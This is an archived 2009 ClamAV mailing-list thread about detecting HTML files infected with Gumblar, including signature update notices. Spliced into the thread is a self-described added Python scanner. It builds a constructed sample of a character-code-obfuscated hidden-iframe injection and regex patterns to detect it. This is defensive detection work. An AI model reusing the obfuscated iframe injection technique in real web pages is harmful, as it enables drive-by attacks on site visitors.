
Mailing List Archive: ClamAV: users

Finding html and related files infected with Gumblar

 

 



peter.abraham at dynamicnet

Jul 20, 2009, 10:00 AM

Post #1 of 6 (1889 views)

Greetings:

At present, Clam Anti-virus 0.95.2 when using ClamScan with --infected does
not find html and related files that have been infected with Gumblar.

When will such detection be available in Clam Anti-virus and Clamscan?

If it is present now, what changes must I make to allow for Clam Anti-virus
to find such infections?

I do have "DetectPUA yes" in clamd.conf

Thank you.

________________________________________________
Peter M. Abraham



_______________________________________________
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


edwintorok at gmail

Jul 20, 2009, 2:28 PM

Post #2 of 6 (1812 views)
Re: Finding html and related files infected with Gumblar

On 2009-07-20 20:00, Peter M. Abraham wrote:
> Greetings:
>
> At present, Clam Anti-virus 0.95.2 when using ClamScan with --infected does
> not find html and related files that have been infected with Gumblar.
>
> When will such detection be available in Clam Anti-virus and Clamscan?
>
> If it is present now, what changes must I make to allow for Clam Anti-virus
> to find such infections?
>
> I do have "DetectPUA yes" in clamd.conf

Hi,

I just published some signatures for Gumblar, more will come later:
ClamAV database updated (20 Jul 2009 17-23 -0400): daily.cvd
Version: 9592

Submission-ID: 8833111
Sender: Virus Total
Added: Trojan.JS.Gumblar-8
Virus name alias: Trojan.Script.129045 (Bitdefender)

Submission-ID: 8869676
Sender: esbjorn krantzen
Added: Trojan.JS.Gumblar
Added: PUA.Script.Packed-4

Submission-ID: 8886181
Sender: yoshiaki ito_20090616
Added: Trojan.JS.Gumblar-1
Added: PUA.Script.Packed-5
Added: Exploit.PDF-73

Submission-ID: 8904202
Sender: Virus Total
Added: Trojan.JS.Gumblar-2
Virus name alias: Trojan.Script.139377 (Bitdefender)

Submission-ID: 9276623
Sender: Virus Total
Added: Trojan.JS.Gumblar-5
Virus name alias: Trojan.Script.173034 (Bitdefender)

Submission-ID: 9419622
Sender: Virus Total
Added: Trojan.JS.Gumblar-7

Submission-ID: 9435021
Sender: Virus Total
Added: Trojan.JS.Gumblar-6

Submission-ID: 9447670
Sender: Virus Total
Added: Trojan.JS.Gumblar-4

Submission-ID: 9452548
Sender: Virus Total
Added: Trojan.JS.Gumblar-3

Best regards,
--Edwin


peter.abraham at dynamicnet

Jul 21, 2009, 7:34 AM

Post #3 of 6 (1800 views)
Re: Finding html and related files infected with Gumblar

Greetings Edwin:

I just created an HTML file with an infection on purpose to test.

clamscan -i -r test.html found no infections.

Here's what I put in the test file:






Please advise.

Thank you.

________________________________________________
Peter M. Abraham


> Message: 2
> Date: Tue, 21 Jul 2009 00:28:08 +0300
> From: Török Edwin <edwintorok [at] gmail>
> Subject: Re: [Clamav-users] Finding html and related files infected
> with Gumblar
> To: ClamAV users ML <clamav-users [at] lists>
> Message-ID: <4A64E168.90908 [at] gmail>
> Content-Type: text/plain; charset=ISO-8859-1
>
>
> Hi,
>
> I just published some signatures for Gumblar, more will come later:
> ClamAV database updated (20 Jul 2009 17-23 -0400): daily.cvd
> Version: 9592
>
> Submission-ID: 8833111
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-8
> Virus name alias: Trojan.Script.129045 (Bitdefender)
>
> Submission-ID: 8869676
> Sender: esbjorn krantzen
> Added: Trojan.JS.Gumblar
> Added: PUA.Script.Packed-4
>
> Submission-ID: 8886181
> Sender: yoshiaki ito_20090616
> Added: Trojan.JS.Gumblar-1
> Added: PUA.Script.Packed-5
> Added: Exploit.PDF-73
>
> Submission-ID: 8904202
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-2
> Virus name alias: Trojan.Script.139377 (Bitdefender)
>
> Submission-ID: 9276623
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-5
> Virus name alias: Trojan.Script.173034 (Bitdefender)
>
> Submission-ID: 9419622
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-7
>
> Submission-ID: 9435021
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-6
>
> Submission-ID: 9447670
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-4
>
> Submission-ID: 9452548
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-3
>
> Best regards,
> --Edwin
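
The test file described in this post hid its markup as decimal character codes joined by a short delimiter and rebuilt it with `split`, `String.fromCharCode` and `document.write`; that shape can be flagged statically on a web root while signatures catch up. This is an added example, not code from the thread or from the ClamAV project: the sample markup, the `example.invalid` host, the thresholds and all function names are constructed for illustration.

```python
import re

# Constructed, benign sample in the style of the test file from the thread:
# decimal character codes joined by a short delimiter, rebuilt at page load.
HIDDEN_MARKUP = '<iframe src="http://example.invalid/" style="opacity:0"></iframe>'
SAMPLE_HTML = (
    '<html><body><script type="text/javascript">var a = "'
    + "".join("nd%d" % ord(c) for c in HIDDEN_MARKUP)
    + '";var b = a.split("nd");var c = "";'
    "for (var i=1; i<b.length; i++){c+=String.fromCharCode(b[i]);}"
    "document.write(c)</script></body></html>"
)
CLEAN_HTML = '<html><script>document.write("hello");</script></html>'

# A missing </script> (truncated file) still yields the script body via \Z.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)(?:</script\s*>|\Z)", re.I | re.S)
STRING_RE = re.compile(r"""(["'])((?:(?!\1).)*)\1""", re.S)
SPLIT_RE = re.compile(r"""\.split\(\s*(["'])(.{1,8}?)\1\s*\)""")
CODE_RE = re.compile(r"[0-9]{1,7}")
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*(opacity\s*:\s*0|display\s*:\s*none|left\s*:\s*-\d+)", re.I)


def decode_charcode_strings(script, min_codes=20):
    """Statically rebuild strings stored as delimiter-separated char codes."""
    if "fromCharCode" not in script:
        return []
    decoded = []
    for delim in {m.group(2) for m in SPLIT_RE.finditer(script)}:
        for _, literal in STRING_RE.findall(script):
            # Drop whitespace so line-wrapped copies of a file still decode.
            parts = [p for p in re.sub(r"\s+", "", literal).split(delim) if p]
            if len(parts) >= min_codes and all(
                    CODE_RE.fullmatch(p) and int(p) < 0x110000 for p in parts):
                decoded.append("".join(chr(int(p)) for p in parts))
    return decoded


def scan_html(html):
    """Return (verdict, decoded_text) findings for one HTML document."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        for text in decode_charcode_strings(script):
            hidden = HIDDEN_IFRAME_RE.search(text) and "document.write" in script
            findings.append(("hidden-iframe" if hidden else "charcode-blob", text))
    return findings
```

Nothing is executed: the script body is only pattern-matched and the character codes converted, so the scanner can be run over untrusted files, and any hit is a lead for manual review and for a sample submission through the web interface rather than a verdict.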



edwintorok at gmail

Jul 21, 2009, 7:39 AM

Post #4 of 6 (1797 views)
Re: Finding html and related files infected with Gumblar

On 2009-07-21 17:34, Peter M. Abraham wrote:
> Greetings Edwin:
>
> I just created an HTML file with an infection on purpose to test.
>
> clamscan -i -r test.html found no infections.
>
> Here's what I put in the test file:
>
>
>

The proper place to submit samples is clamav.net/sendvirus, and NOT this
mailing list.

See rules at:
http://lists.clamav.net/mailman/listinfo/clamav-users

DO NOT SEND VIRUS SAMPLES HERE!!! NOT EVEN LINKS TO VIRUSES!!! Send them
through our web interface at http://www.clamav.net/sendvirus

Best regards,
--Edwin


rafael at bolso

Jul 21, 2009, 8:54 AM

Post #5 of 6 (1792 views)
Re: Finding html and related files infected with Gumblar

Peter M. Abraham wrote:
> Greetings Edwin:
>
> I just created an HTML file with an infection on purpose to test.
>
> clamscan -i -r test.html found no infections.
>
> Here's what I put in the test file:

Bitdefender detects it as Trojan.Script.177381


peter.abraham at dynamicnet

Jul 22, 2009, 4:54 AM

Post #6 of 6 (1790 views)
Re: Finding html and related files infected with Gumblar

Greetings:

Does Clam Anti-Virus have this signature yet?

Thank you!


________________________________________________
Peter M. Abraham

> Message: 4
> Date: Tue, 21 Jul 2009 12:54:38 -0300
> From: rafa <rafael [at] bolso>
> Subject: Re: [Clamav-users] Finding html and related files infected
> with Gumblar
> To: ClamAV users ML <clamav-users [at] lists>
> Message-ID: <20090721155439.25ECC2584EC [at] farallon>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> Peter M. Abraham wrote:
> > Greetings Edwin:
> >
> > I just created an HTML file with an infection on purpose to test.
> >
> > clamscan -i -r test.html found no infections.
> >
> > Here's what I put in the test file:
>
> Bitdefender detects it as Trojan.Script.177381

